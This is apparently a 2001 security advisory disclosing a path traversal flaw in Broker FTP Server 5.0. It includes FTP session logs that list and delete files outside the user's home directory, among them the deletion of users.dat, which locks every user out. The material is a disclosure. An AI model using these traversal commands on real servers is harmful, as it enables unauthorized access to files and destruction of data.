Broker Ftp Server 5.0 Vulnerability

2001-03-05T00:00:00
ID SECURITYVULNS:DOC:1349
Type securityvulns
Reporter Securityvulns
Modified 2001-03-05T00:00:00

Description

Vulnerability:

users can break out of their root directory and list directories. Depending on the priv. you have other commands like delete maybe executed outside of the home. directory.

e:\crap\ was used as homedir. deleting files in e:\crap is enabled

Detail:

Problem: Again relative paths.

dir: listings directories outside of root dir. Risc: medium-high

230 User test logged in. ftp> dir 200 Port command successful. 150 Opening data connection for directory list. drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test -rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33 movedtohomedir.txt -rw-rw-rw- 1 ftp ftp 11 Mar 02 00:29 bisontest.txt drw-rw-rw- 1 ftp ftp 0 Mar 03 15:59 HTTP drw-rw-rw- 1 ftp ftp 0 Mar 03 17:05 huhu 226 File sent ok FTP: 323 Bytes empfangen in 0,00Sekunden 323000,00KB/s ftp> cd .. 550 CWD failed. ..: No permission

ftp> dir /../experimental/broker/data/ 200 Port command successful. 150 Opening data connection for directory list. -rw-rw-rw- 1 ftp ftp 175 Nov 19 2000 UserGrps.dat -rw-rw-rw- 1 ftp ftp 154 Mar 03 16:54 Users.dat -rw-rw-rw- 1 ftp ftp 0 Mar 03 16:33 Users.4800.bak -rw-rw-rw- 1 ftp ftp 0 Mar 03 16:34 Users.4800-Prof.bak -rw-rw-rw- 1 ftp ftp 31 Mar 03 16:59 BannCtrl.ini -rw-rw-rw- 1 ftp ftp 34 Mar 03 17:08 KickCtrl.ini -rw-rw-rw- 1 ftp ftp 38 Mar 03 16:37 Events_1.dat -rw-rw-rw- 1 ftp ftp 0 Mar 03 16:53 Events_lst_1.dat -rw-rw-rw- 1 ftp ftp 154 Mar 03 16:54 Kopie von Users.dat 226 File sent ok FTP: 629 Bytes empfangen in 0,00Sekunden 629000,00KB/s

delete: deleting files outside of root dir.

ftp> delete /../experimental/broker/data/users.dat 250 File '/../experimental/broker/data/users.dat' deleted. ftp> quit 221-Thank you for your visit. 221- 221 Goodbye.

C:\>ftp 10.17.3.44 Verbindung mit 10.17.3.44 wurde hergestellt. 220 FTP Server ready [***] Benutzer (10.17.3.44:(none)): test 331 Password required for test. Kennwort: 530 Login incorrect. Anmeldung fehlgeschlagen. ftp> :(

by deleting users.dat, noone will be able to logon ...

put/get commands seem to be secure...

This was tested with win2k and trail version of broker ver. 5.0

se00020@fhs-hagenberg.ac.at or se00020@lion.cc